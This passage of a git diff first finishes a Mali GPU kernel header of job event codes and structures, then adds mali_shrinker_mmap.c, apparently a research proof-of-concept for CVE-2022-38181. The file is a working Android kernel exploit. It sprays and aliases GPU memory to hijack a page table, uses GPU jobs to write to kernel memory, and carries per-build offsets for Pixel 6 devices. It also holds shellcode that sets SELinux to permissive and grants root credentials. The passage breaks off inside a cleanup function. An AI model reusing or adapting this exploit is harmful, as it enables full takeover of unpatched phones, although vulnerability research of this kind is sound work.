@BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in + * the GPU has to be retried (but it has not + * started) due to e.g., GPU reset + * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal + * the completion of a renderpass. This value + * shouldn't be returned to userspace but I haven't + * seen where it is reset back to JD_EVENT_DONE. + * + * HW and low-level SW events are represented by event codes. + * The status of jobs which succeeded are also represented by + * an event code (see @BASE_JD_EVENT_DONE). + * Events are usually reported as part of a &struct base_jd_event. 
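+ * + * Illustrative example (not driver text): the type bits of a code can be + * extracted with BASE_JD_SW_EVENT_TYPE_MASK, e.g. + * (BASE_JD_EVENT_JOB_CANCELLED & BASE_JD_SW_EVENT_TYPE_MASK) evaluates to + * BASE_JD_SW_EVENT_JOB.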
+ * + * The event codes are encoded in the following way: + * * 10:0 - subtype + * * 12:11 - type + * * 13 - SW success (only valid if the SW bit is set) + * * 14 - SW event (HW event if not set) + * * 15 - Kernel event (should never be seen in userspace) + * + * Events are split up into ranges as follows: + * * BASE_JD_EVENT_RANGE_<description>_START + * * BASE_JD_EVENT_RANGE_<description>_END + * + * code is in <description>'s range when: + * BASE_JD_EVENT_RANGE_<description>_START <= code < + * BASE_JD_EVENT_RANGE_<description>_END + * + * Ranges can be asserted for adjacency by testing that the END of the previous + * is equal to the START of the next. This is useful for optimizing some tests + * for range. + * + * A limitation is that the last member of this enum must explicitly be handled + * (with an assert-unreachable statement) in switch statements that use + * variables of this type. Otherwise, the compiler warns that we have not + * handled that enum value. + */ +enum base_jd_event_code { + /* HW defined exceptions */ + BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0, + + /* non-fatal exceptions */ + BASE_JD_EVENT_NOT_STARTED = 0x00, + BASE_JD_EVENT_DONE = 0x01, + BASE_JD_EVENT_STOPPED = 0x03, + BASE_JD_EVENT_TERMINATED = 0x04, + BASE_JD_EVENT_ACTIVE = 0x08, + + BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40, + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40, + + /* job exceptions */ + BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40, + BASE_JD_EVENT_JOB_POWER_FAULT = 0x41, + BASE_JD_EVENT_JOB_READ_FAULT = 0x42, + BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43, + BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44, + BASE_JD_EVENT_JOB_BUS_FAULT = 0x48, + BASE_JD_EVENT_INSTR_INVALID_PC = 0x50, + BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51, + BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52, + BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53, + BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54, + BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55, + BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56, + BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58, + BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59, + BASE_JD_EVENT_STATE_FAULT = 0x5A, + BASE_JD_EVENT_OUT_OF_MEMORY = 0x60, + BASE_JD_EVENT_UNKNOWN = 0x7F, + + /* GPU exceptions */ + BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80, + BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88, + + /* MMU exceptions */ + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4, + BASE_JD_EVENT_PERMISSION_FAULT = 0xC8, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4, + BASE_JD_EVENT_ACCESS_FLAG = 0xD8, + + /* SW defined exceptions */ + BASE_JD_EVENT_MEM_GROWTH_FAILED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_TIMED_OUT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001, + BASE_JD_EVENT_JOB_CANCELLED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002, + BASE_JD_EVENT_JOB_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003, + BASE_JD_EVENT_PM_EVENT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004, + + BASE_JD_EVENT_BAG_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003, + + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | 0x000, + + BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_BAG_DONE =
BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS | + BASE_JD_SW_EVENT_BAG | 0x000, + BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | 0x000, + BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF +}; + +/** + * struct base_jd_event_v2 - Event reporting structure + * + * @event_code: event code. + * @atom_number: the atom number that has completed. + * @udata: user data. + * + * This structure is used by the kernel driver to report information + * about GPU events. They can either be HW-specific events or low-level + * SW events, such as job-chain completion. + * + * The event code contains an event type field which can be extracted + * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK. + */ +struct base_jd_event_v2 { + enum base_jd_event_code event_code; + base_atom_id atom_number; + struct base_jd_udata udata; +}; + +/** + * struct base_dump_cpu_gpu_counters - Structure for + * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS + * jobs. + * @system_time: gpu timestamp + * @cycle_counter: gpu cycle count + * @sec: cpu time(sec) + * @usec: cpu time(usec) + * @padding: padding + * + * This structure is stored into the memory pointed to by the @jc field + * of &struct base_jd_atom. + * + * It must not occupy the same CPU cache line(s) as any neighboring data. + * This is to avoid cases where access to pages containing the structure + * is shared between cached and un-cached memory regions, which would + * cause memory corruption. + */ + +struct base_dump_cpu_gpu_counters { + __u64 system_time; + __u64 cycle_counter; + __u64 sec; + __u32 usec; + __u8 padding[36]; +}; + +#endif /* _UAPI_BASE_JM_KERNEL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c new file mode 100644 index 0000000..5cf4aef --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c @@ -0,0 +1,796 @@ +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <fcntl.h> +#include <unistd.h> +#include <err.h> +#include <errno.h> +#include <sys/ioctl.h> +#include <sys/mman.h> +#include <stdint.h> +#include "stdbool.h" +#include <sys/types.h> +#include <sys/syscall.h> + +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "midgard.h" + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include <android/log.h> +#define LOG(fmt, ...)
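/* when not built with -DSHELL, route exploit logging to Android logcat */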
__android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) + +#endif //SHELL + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576) + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define SPRAY_PAGES 25 + +#define SPRAY_NUM 64 + +#define FLUSH_SIZE (0x1000 * 0x1000) + +#define SPRAY_CPU 0 + +#define POOL_SIZE 16384 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define FLUSH_REGION_SIZE 500 + +#define NUM_TRIALS 100 + +#define KERNEL_BASE 0x80000000 + +#define OVERWRITE_INDEX 256 + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +#define AVC_DENY_2108 0x92df1c + +#define SEL_READ_ENFORCE_2108 0x942ae4 + +#define INIT_CRED_2108 0x29a0570 + +#define COMMIT_CREDS_2108 0x180b0c + +#define ADD_INIT_2108 0x9115c000 + +#define ADD_COMMIT_2108 0x912c3108 + +#define AVC_DENY_2201 0x930af4 + +#define SEL_READ_ENFORCE_2201 0x9456bc + +#define INIT_CRED_2201 0x29b0570 + +#define COMMIT_CREDS_2201 0x183df0 + +#define ADD_INIT_2201 0x9115c000 + +#define ADD_COMMIT_2201 0x9137c108 + +#define AVC_DENY_2202 0x930b50 + +#define SEL_READ_ENFORCE_2202 0x94551c + +#define INIT_CRED_2202 0x29b0570 + +#define COMMIT_CREDS_2202 0x183e3c + +#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570 + +#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c + +#define AVC_DENY_2207 0x927664 + +#define SEL_READ_ENFORCE_2207 0x93bf5c + +#define INIT_CRED_2207 0x29e07f0 + +#define COMMIT_CREDS_2207 0x18629c + +#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0 + +#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c + +#define AVC_DENY_2211 0x8d6810 + +#define SEL_READ_ENFORCE_2211 0x8ea124 + +#define INIT_CRED_2211 0x2fd1388 + +#define COMMIT_CREDS_2211 0x17ada4 + +#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388 + +#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4 + +#define AVC_DENY_2212 0x8ba710 + +#define SEL_READ_ENFORCE_2212 0x8cdfd4 + +#define INIT_CRED_2212 0x2fd1418 + +#define COMMIT_CREDS_2212 0x177ee4 + +#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4 + + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207; + +static uint64_t avc_deny = AVC_DENY_2207; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint8_t jit_id = 1; +static uint8_t atom_number = 1; +static uint64_t gpu_va[SPRAY_NUM] = {0}; +static int gpu_va_idx = 0; +static void* flush_regions[FLUSH_REGION_SIZE]; +static void* alias_regions[SPRAY_NUM] = {0}; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +void setup_mali(int fd, int group_id) { + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + err(1, "version check failed\n"); + } + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, 
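/* not a real file offset: BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) is a special cookie whose mmap() sets up the per-context memory-usage tracking page that kbase expects before the other memory ioctls are used */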
BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) { + struct base_jit_alloc_info info = {0}; + struct base_jd_atom_v2 atom = {0}; + + info.id = id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = va_pages; + info.extension = 0x1000; + + atom.jc = (uint64_t)(&info); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + return *((uint64_t*)gpu_alloc_addr); +} + +void jit_free(int fd, uint8_t atom_number, uint8_t id) { + uint8_t free_id = id; + + struct base_jd_atom_v2 atom = {0}; + + atom.jc = (uint64_t)(&free_id); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + +} + +void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { + struct kbase_ioctl_mem_flags_change change = {0}; + change.flags = flags; + change.gpu_va = gpu_addr; + change.mask = flags; + if (ignore_results) { + ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change); + return; + } + if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) { + err(1, "flags_change failed\n"); + } +} + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) { + err(1, "mem_alias failed\n"); + } +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, .pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + err(1, "mem_commit failed\n"); + } +} + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +uint64_t alloc_mem(int
mali_fd, unsigned int pages) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void free_mem(int mali_fd, uint64_t gpuaddr) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +int migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + return -1; + } + return 0; +} + +void* flush(int spray_cpu, int idx) { + migrate_to_cpu(spray_cpu); + void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (region == MAP_FAILED) err(1, "flush failed"); + memset(region, idx, FLUSH_SIZE); + return region; +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed"); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t alias_sprayed_regions(int mali_fd) { + union kbase_ioctl_mem_alias alias = {0}; + alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + alias.in.stride = SPRAY_PAGES; + + alias.in.nents = SPRAY_NUM; + struct base_mem_aliasing_info ai[SPRAY_NUM]; + for (int i = 0; i < SPRAY_NUM; i++) { + ai[i].handle.basep.handle = gpu_va[i]; + ai[i].length = SPRAY_PAGES; + ai[i].offset = 0; + } + alias.in.aliasing_info = (uint64_t)(&(ai[0])); + mem_alias(mali_fd, &alias); + uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES; + void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap alias failed"); 
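+  /* Keeping a second mapping of every sprayed region is the point of the
+     alias: when the backing pages of one region are freed by the bug and
+     reused as a GPU page table, find_pgd() can still read them through the
+     per-region alias mappings created below. */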
+ } + alias_regions[0] = region; + for (int i = 1; i < SPRAY_NUM; i++) { + void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES); + if (this_region == MAP_FAILED) { + err(1, "mmap alias failed %d\n", i); + } + alias_regions[i] = this_region; + } + return (uint64_t)region; +} + +void fault_pages() { + int read = 0; + for (int va = 0; va < SPRAY_NUM; va++) { + uint8_t* this_va = (uint8_t*)(gpu_va[va]); + *this_va = 0; + uint8_t* this_alias = alias_regions[va]; + read += *this_alias; + } + LOG("read %d\n", read); +} + +int find_freed_idx(int mali_fd) { + int freed_idx = -1; + for (int j = 0; j < SPRAY_NUM; j++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = gpu_va[j]; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query); + if (query.out.value != SPRAY_PAGES) { + LOG("jit_free commit: %d %llu\n", j, query.out.value); + freed_idx = j; + } + } + return freed_idx; +} + +int find_pgd(int freed_idx, int start_pg) { + uint64_t* this_alias = alias_regions[freed_idx]; + for (int pg = start_pg; pg < SPRAY_PAGES; pg++) { + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = this_alias[pg * 0x1000/8 + i]; + if ((entry & 0x443) == 0x443) { + return pg; + } + } + } + return -1; +} + +uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +uint32_t hi32(uint64_t x) { + return x >> 32; +} + +uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + 
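+  /* BASE_JD_REQ_CS submits this as a hardware job chain: the GPU itself
+     executes the WRITE_VALUE job and stores `value` at gpu_addr, so once a
+     page-table entry has been redirected this becomes an arbitrary
+     kernel-memory write primitive. */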
struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) { + avc_deny = AVC_DENY_2108; + sel_read_enforce = SEL_READ_ENFORCE_2108; + fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) { + avc_deny = AVC_DENY_2201; + sel_read_enforce = SEL_READ_ENFORCE_2201; + fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) { + avc_deny = AVC_DENY_2202; + sel_read_enforce = SEL_READ_ENFORCE_2202; + fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) { + avc_deny = AVC_DENY_2207; + sel_read_enforce = SEL_READ_ENFORCE_2207; + fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) { + avc_deny = AVC_DENY_2211; + sel_read_enforce = SEL_READ_ENFORCE_2211; + fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) { + avc_deny = AVC_DENY_2212; + sel_read_enforce = SEL_READ_ENFORCE_2212; + fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212); + return; + } + + err(1, "unable to match build id\n"); +} + +void cleanup(int mali_fd, uint64_t pgd) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, 
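+    /* writing 2 puts the hijacked level-3 entry back into an invalid state
+       (2 appears to be the kbase MMU's invalid-entry marker), so no stale
+       mapping of kernel memory is left behind */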
